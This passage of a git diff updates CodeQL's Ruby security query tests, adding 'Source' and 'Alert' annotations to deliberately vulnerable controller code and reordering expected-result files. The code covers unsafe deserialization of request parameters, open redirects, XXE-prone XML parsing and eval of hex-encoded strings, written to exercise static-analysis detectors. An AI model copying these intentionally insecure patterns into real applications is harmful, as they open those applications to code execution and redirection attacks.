to read | value from stdin | +| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | +| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | edges | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | provenance | | | UnsafeDeserialization.rb:11:23:11:50 | call to decode64 | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | provenance | | @@ -129,31 +157,3 @@ nodes | UnsafeDeserialization.rb:170:24:170:27 | call to gets | semmle.label | call to gets | | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | semmle.label | call to readlines | subpaths -#select -| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | -| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | -| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | -| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | -| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | -| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | -| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb index 633a99c14fbb..b019bc0cb0e0 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb @@ -8,26 +8,26 @@ class UsersController < ActionController::Base # BAD def route0 - serialized_data = Base64.decode64 params[:key] - object = Marshal.load serialized_data + serialized_data = Base64.decode64 params[:key] # $ Source + object = Marshal.load serialized_data # $ Alert end # BAD def route1 - serialized_data = Base64.decode64 params[:key] - object = Marshal.restore serialized_data + serialized_data = Base64.decode64 params[:key] # $ Source + object = Marshal.restore serialized_data # $ Alert end # BAD def route2 - json_data = params[:key] - object = JSON.load json_data + json_data = params[:key] # $ Source + object = JSON.load json_data # $ Alert end # BAD def route3 - json_data = params[:key] - object = JSON.restore json_data + json_data = params[:key] # $ Source + object = JSON.restore json_data # $ Alert end # GOOD - JSON.parse is safe to use on untrusted data @@ -38,8 +38,8 @@ def route4 # BAD def route5 - yaml_data = params[:key] - object = YAML.load yaml_data + yaml_data = params[:key] # $ Source + object = YAML.load yaml_data # $ Alert end # GOOD @@ -50,14 +50,14 @@ def route6 # BAD - Oj.load is unsafe in its default :object mode def route7 - json_data = params[:key] - object = Oj.load json_data - object = Oj.load json_data, mode: :object + json_data = params[:key] # $ Source + object = Oj.load json_data # $ Alert + object = Oj.load json_data, mode: :object # $ Alert end # GOOD - Oj.load is safe in any other mode def route8 - json_data = params[:key] + json_data = params[:key] # $ Source # Test the different ways the options hash can be passed options = { allow_blank: true, mode: :rails } object1 = Oj.load json_data, options @@ -67,7 +67,7 @@ def route8 # TODO: false positive; we aren't detecting flow from `:json` to the call argument. more_options = { allow_blank: true } more_options[:mode] = :json - object4 = Oj.load json_data, more_options + object4 = Oj.load json_data, more_options # $ Alert end # GOOD @@ -78,20 +78,20 @@ def route9 # BAD - Oj.object_load is always unsafe def route10 - json_data = params[:key] - object = Oj.object_load json_data + json_data = params[:key] # $ Source + object = Oj.object_load json_data # $ Alert end # BAD - Ox.parse_obj is always unsafe def route11 - xml_data = params[:key] - object = Ox.parse_obj xml_data + xml_data = params[:key] # $ Source + object = Ox.parse_obj xml_data # $ Alert end # BAD - Ox.load with :object mode is always unsafe def route12 - xml_data = params[:key] - object = Ox.load xml_data, mode: :object + xml_data = params[:key] # $ Source + object = Ox.load xml_data, mode: :object # $ Alert end # GOOD - Ox.load is safe in the default mode (which is :generic) and in any other mode than :object @@ -106,21 +106,21 @@ def route13 # BAD - `Hash.from_trusted_xml` will deserialize elements with the # `type="yaml"` attribute as YAML. def route14 - xml = params[:key] - hash = Hash.from_trusted_xml(xml) + xml = params[:key] # $ Source + hash = Hash.from_trusted_xml(xml) # $ Alert end # BAD before psych version 4.0.0 def route15 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end # GOOD In psych version 4.0.0 and above def route16 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end @@ -134,21 +134,21 @@ def route17 # BAD def route18 - yaml_data = params[:key] - object = Psych.unsafe_load(yaml_data) - object = Psych.unsafe_load_file(yaml_data) - object = Psych.load_stream(yaml_data) + yaml_data = params[:key] # $ Source + object = Psych.unsafe_load(yaml_data) # $ Alert + object = Psych.unsafe_load_file(yaml_data) # $ Alert + object = Psych.load_stream(yaml_data) # $ Alert parse_output = Psych.parse_stream(yaml_data) - object = parse_output.to_ruby - object = Psych.parse(yaml_data).to_ruby - object = Psych.parse_file(yaml_data).to_ruby + object = parse_output.to_ruby # $ Alert + object = Psych.parse(yaml_data).to_ruby # $ Alert + object = Psych.parse_file(yaml_data).to_ruby # $ Alert end # BAD def route19 - plist_data = params[:key] - result = Plist.parse_xml(plist_data) - result = Plist.parse_xml(plist_data, marshal: true) + plist_data = params[:key] # $ Source + result = Plist.parse_xml(plist_data) # $ Alert + result = Plist.parse_xml(plist_data, marshal: true) # $ Alert end # GOOD @@ -158,18 +158,18 @@ def route20 end def stdin - object = YAML.load $stdin.read + object = YAML.load $stdin.read # $ Alert # STDIN - object = YAML.load STDIN.gets + object = YAML.load STDIN.gets # $ Alert # ARGF - object = YAML.load ARGF.read + object = YAML.load ARGF.read # $ Alert # Kernel.gets - object = YAML.load gets + object = YAML.load gets # $ Alert # Kernel.readlines - object = YAML.load readlines + object = YAML.load readlines # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected index 2935e15cbd6e..fe3a1d20a041 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected @@ -1,3 +1,7 @@ +#select +| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | +| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | +| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | edges | tst.rb:1:7:1:7 | r : String | tst.rb:2:4:2:4 | r : String | provenance | | | tst.rb:2:3:2:5 | call to [] : Array [element 0] : String | tst.rb:2:3:2:15 | call to pack | provenance | Config | @@ -29,7 +33,3 @@ nodes subpaths | tst.rb:7:8:7:30 | totally_harmless_string : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:7:6:7:31 | call to e | | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:10:9:10:25 | call to e | -#select -| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | -| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | -| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref index afa4fec282c5..48494558b680 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref @@ -1 +1,2 @@ -queries/security/cwe-506/HardcodedDataInterpretedAsCode.ql +query: queries/security/cwe-506/HardcodedDataInterpretedAsCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-506/tst.rb b/ruby/ql/test/query-tests/security/cwe-506/tst.rb index 67d117e95c49..bcc2c61f027a 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/tst.rb +++ b/ruby/ql/test/query-tests/security/cwe-506/tst.rb @@ -2,17 +2,17 @@ def e(r) [r].pack 'H*' end -totally_harmless_string = '707574732822636f646520696e6a656374696f6e2229' +totally_harmless_string = '707574732822636f646520696e6a656374696f6e2229' # $ Source -eval(e(totally_harmless_string)) # NOT OK: eval("puts('hello'") +eval(e(totally_harmless_string)) # NOT OK: eval("puts('hello'") # $ Alert eval(totally_harmless_string) # OK: throws parse error -require e('666f6f626172') # NOT OK: require 'foobar' +require e('666f6f626172') # NOT OK: require 'foobar' # $ Alert require '666f6f626172' # OK: no taint step between source and sink x = 'deadbeef' require e(x) # OK: doesn't meet our criteria for being a source -another_questionable_string = "\x70\x75\x74\x73\x28\x27\x68\x65\x6C\x6C\x6F\x27\x29" -eval(another_questionable_string.strip) # NOT OK: eval("puts('hello'") +another_questionable_string = "\x70\x75\x74\x73\x28\x27\x68\x65\x6C\x6C\x6F\x27\x29" # $ Source +eval(another_questionable_string.strip) # NOT OK: eval("puts('hello'") # $ Alert eval(another_questionable_string) # OK: no taint step between source and sink diff --git a/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref b/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref index 98d0d8e6be71..1488e6145ba9 100644 --- a/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref @@ -1 +1,2 @@ -queries/security/cwe-598/SensitiveGetQuery.ql \ No newline at end of file +query: queries/security/cwe-598/SensitiveGetQuery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb index 441d8b493ab4..3fefc82a0922 100644 --- a/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb @@ -1,17 +1,17 @@ class UsersController < ApplicationController def login_get_1 - foo = params[:password] # BAD: route handler uses GET query parameters to receive sensitive data + foo = params[:password] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], foo) end def login_get_2 - password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data + password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], password) end def login_get_3 - @password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data + @password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], @password) end diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected index cd2845ea7a56..7df096e2d2fa 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected @@ -1,3 +1,14 @@ +#select +| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | +| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | +| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | +| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | +| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | +| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | +| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | +| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | +| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | +| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | edges | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | provenance | | | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | provenance | | @@ -40,14 +51,3 @@ nodes | UrlRedirect.rb:94:5:94:29 | call to permit | semmle.label | call to permit | subpaths | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:93:21:93:32 | input_params | UrlRedirect.rb:94:5:94:29 | call to permit | UrlRedirect.rb:24:17:24:37 | call to filter_params | -#select -| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | -| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | -| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | -| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | -| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | -| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | -| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | -| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | -| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | -| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref index 422dc00837aa..76f39c8d6f3d 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref @@ -1 +1,2 @@ -queries/security/cwe-601/UrlRedirect.ql +query: queries/security/cwe-601/UrlRedirect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb index 78f2248434b1..f44cef2b558e 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb @@ -1,27 +1,27 @@ class UsersController < ActionController::Base # BAD def route1 - redirect_to params + redirect_to params # $ Alert end # BAD def route2 - redirect_to params[:key] + redirect_to params[:key] # $ Alert end # BAD def route3 - redirect_to params.fetch(:specific_arg) + redirect_to params.fetch(:specific_arg) # $ Alert end # BAD def route4 - redirect_to params.to_unsafe_hash + redirect_to params.to_unsafe_hash # $ Alert end # BAD def route5 - redirect_to filter_params(params) + redirect_to filter_params(params) # $ Alert end # GOOD @@ -31,7 +31,7 @@ def route6 # BAD def route7 - redirect_to "#{params[:key]}/foo" + redirect_to "#{params[:key]}/foo" # $ Alert end # GOOD @@ -55,22 +55,22 @@ def create1 # The same as `create1` but this is reachable via a GET request, as configured # by the routes at the bottom of this file. def route9 - redirect_to params[:key] + redirect_to params[:key] # $ Alert end # BAD def route10 - redirect_back fallback_location: params[:key] + redirect_back fallback_location: params[:key] # $ Alert end # BAD def route11 - redirect_back fallback_location: params[:key], allow_other_host: true + redirect_back fallback_location: params[:key], allow_other_host: true # $ Alert end # BAD def route12 - redirect_back_or_to params[:key] + redirect_back_or_to params[:key] # $ Alert end # GOOD diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb index 4e3565e149a2..c7013082c77e 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb @@ -13,11 +13,11 @@ def self.default_substitute_entities class LibXmlRubyXXE < ApplicationController def foo - content = params[:xml] + content = params[:xml] # $ Source - LibXML::XML::Parser.file(content, { options: 2048 }) - Hash.from_xml(content) - Hash.from_trusted_xml(content) - ActiveSupport::XmlMini.parse(content) + LibXML::XML::Parser.file(content, { options: 2048 }) # $ Alert + Hash.from_xml(content) # $ Alert + Hash.from_trusted_xml(content) # $ Alert + ActiveSupport::XmlMini.parse(content) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected index d819e92c9305..787038e80f2b 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected @@ -1,3 +1,8 @@ +#select +| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | 